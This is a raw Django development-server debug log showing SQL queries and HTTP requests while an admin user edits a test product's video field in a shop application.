args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 17, 6, 131219, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:17:06] "GET /shop/product/ HTTP/1.0" 200 10009 DEBUG 2019-12-06 13:17:06,641 utils 30355 140219565704960 (0.008) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:06.620459+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 6, 620459, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:06,646 utils 30355 140219565704960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:17:06] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 13:17:09,828 utils 30355 140219565704960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:09.819244+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 9, 819244, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:09,832 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:17:09,835 utils 30355 140219565704960 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 3; args=(3,) DEBUG 2019-12-06 13:17:09,887 utils 30355 140219565704960 (0.002) DECLARE "_django_curs_140219565704960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 13:17:09,938 utils 30355 140219565704960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:17:09.936454+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 17, 9, 936454, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:17:09] "GET /shop/product/3/change/ HTTP/1.0" 200 9200 DEBUG 2019-12-06 13:17:10,204 utils 30355 140219565704960 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:10.194620+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 10, 194620, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:10,208 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:17:10] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 13:17:42,207 utils 30355 140219565704960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:42.197480+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 42, 197480, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:42,210 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:17:42,213 utils 30355 140219565704960 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 3; args=(3,) DEBUG 2019-12-06 13:17:42,220 utils 30355 140219565704960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-06 13:17:42,223 utils 30355 140219565704960 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-06 13:17:42,233 utils 30355 140219565704960 (0.001) UPDATE "shop_product" SET "category_id" = 1, "name" = 'sample fire', "slug" = 'sample-fire', "image" = 'products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg', "video" = 'videos/2019/12/06/SampleVideo_1280x720_2mb.flv', "description" = 'only for test', "price" = '120', "stock" = 20, "available" = true, "created" = '2019-12-06T12:52:40.902491+00:00'::timestamptz, "updated" = '2019-12-06T13:17:42.231218+00:00'::timestamptz WHERE "shop_product"."id" = 3; args=(1, 'sample fire', 'sample-fire', 'products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg', 'videos/2019/12/06/SampleVideo_1280x720_2mb.flv', 'only for test', '120', 20, True, datetime.datetime(2019, 12, 6, 12, 52, 40, 902491, tzinfo=), datetime.datetime(2019, 12, 6, 13, 17, 42, 231218, tzinfo=), 3) DEBUG 2019-12-06 13:17:42,238 utils 30355 140219565704960 (0.002) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-06T13:17:42.235033+00:00'::timestamptz, 6, 9, '3', 'sample fire', 2, '[{"changed": {"fields": ["video"]}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 6, 13, 17, 42, 235033, tzinfo=), 6, 9, '3', 'sample fire', 2, '[{"changed": {"fields": ["video"]}}]') [06/Dec/2019 13:17:42] "POST /shop/product/3/change/ HTTP/1.0" 302 0 DEBUG 2019-12-06 13:17:42,527 utils 30355 140219565704960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:42.516998+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 42, 516998, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:42,530 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:17:42,536 utils 30355 140219565704960 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:17:42,537 utils 30355 140219565704960 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:17:42,544 utils 30355 140219565704960 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 13:17:42,668 utils 30355 140219565704960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:17:42.665677+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 17, 42, 665677, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:17:42] "GET /shop/product/ HTTP/1.0" 200 10189 DEBUG 2019-12-06 13:17:42,965 utils 30355 140219565704960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:42.954743+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 42, 954743, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:42,968 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:17:42] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 13:17:53,340 utils 30355 140219565704960 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:53.328349+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 53, 328349, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:53,344 utils 30355 140219565704960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:17:53,349 utils 30355 140219565704960 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 3; args=(3,) DEBUG 2019-12-06 13:17:53,409 utils 30355 140219565704960 (0.002) DECLARE "_django_curs_140219565704960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 13:17:53,458 utils 30355 140219565704960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:17:53.456403+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 17, 53, 456403, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:17:53] "GET /shop/product/3/change/ HTTP/1.0" 200 9356 DEBUG 2019-12-06 13:17:53,763 utils 30355 140219565704960 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:53.750609+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 53, 750609, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:53,766 utils 30355 140219565704960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:17:53] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 13:17:55] "GET /media/videos/2019/12/06/SampleVideo_1280x720_2mb.flv HTTP/1.0" 200 2097492 DEBUG 2019-12-06 13:18:19,525 utils 30355 140219565704960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:18:19.516522+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 18, 19, 516522, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:18:19,528 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:18:19,531 utils 30355 140219565704960 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 3; args=(3,) DEBUG 2019-12-06 13:18:19,573 utils 30355 140219565704960 (0.002) DECLARE "_django_curs_140219565704960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 13:18:19,622 utils 30355 140219565704960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:18:19.620853+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 18, 19, 620853, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:18:19] "GET /shop/product/3/change/ HTTP/1.0" 200 9356 DEBUG 2019-12-06 13:18:19,965 utils 30355 140219565704960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:18:19.957074+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 18, 19, 957074, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:18:19,968 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:18:19] "GET /jsi18n/ HTTP/1.0" 200 3223 Not Found: /videos/2019/12/06/SampleVideo_1280x720_2mb.flv [06/Dec/2019 13:18:21] "GET /videos/2019/12/06/SampleVideo_1280x720_2mb.flv HTTP/1.0" 404 6734 [06/Dec/2019 13:18:51] "GET /media/videos/2019/12/06/SampleVideo_1280x720_2mb.flv HTTP/1.0" 304 0 [06/Dec/2019 13:19:15] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [06/Dec/2019 13:19:33] "GET /media/videos/2019/12/06/SampleVideo_1280x720_2mb.flv HTTP/1.0" 304 0 [06/Dec/2019 13:19:42] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [06/Dec/2019 13:19:42] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [06/Dec/2019 13:19:42] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [06/Dec/2019 13:19:42] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [06/Dec/2019 13:19:42] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [06/Dec/2019 13:19:42] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [06/Dec/2019 13:19:42] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [06/Dec/2019 13:19:42] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [06/Dec/2019 13:19:42] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [06/Dec/2019 13:19:42] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [06/Dec/2019 13:20:11] "GET / HTTP/1.0" 302 0 [06/Dec/2019 13:20:20] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [06/Dec/2019 13:20:20] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [06/Dec/2019 13:20:20] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [06/Dec/2019 13:20:20] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [06/Dec/2019 13:20:20] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [06/Dec/2019 13:20:20] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [06/Dec/2019 13:20:20] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [06/Dec/2019 13:20:20] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [06/Dec/2019 13:20:20] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [06/Dec/2019 13:20:20] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [06/Dec/2019 13:22:31] "GET /media/videos/2019/12/06/SampleVideo_1280x720_2mb.flv HTTP/1.0" 200 2097492 [06/Dec/2019 13:22:56] "GET /media/videos/2019/12/06/SampleVideo_1280x720_2mb.flv HTTP/1.0" 304 0 [06/Dec/2019 13:25:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 13:26:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 13:27:21,818 utils 30355 140219454052096 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:27:21.804184+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 27, 21, 804184, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:27:21,821 utils 30355 140219454052096 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:27:21,827 utils 30355 140219454052096 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:27:21,828 utils 30355 140219454052096 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:27:21,835 utils 30355 140219454052096 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 13:27:21,982 utils 30355 140219454052096 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:27:21.979727+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 27, 21, 979727, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:27:21] "GET /shop/product/ HTTP/1.0" 200 10008 DEBUG 2019-12-06 13:27:22,283 utils 30355 140219454052096 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:27:22.271378+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 27, 22, 271378, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:27:22,286 utils 30355 140219454052096 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:27:22] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 13:27:24,749 utils 30355 140219454052096 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:27:24.739943+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 27, 24, 739943, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:27:24,752 utils 30355 140219454052096 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:27:24,755 utils 30355 140219454052096 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-06 13:27:24,839 utils 30355 140219454052096 (0.003) DECLARE "_django_curs_140219454052096_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", 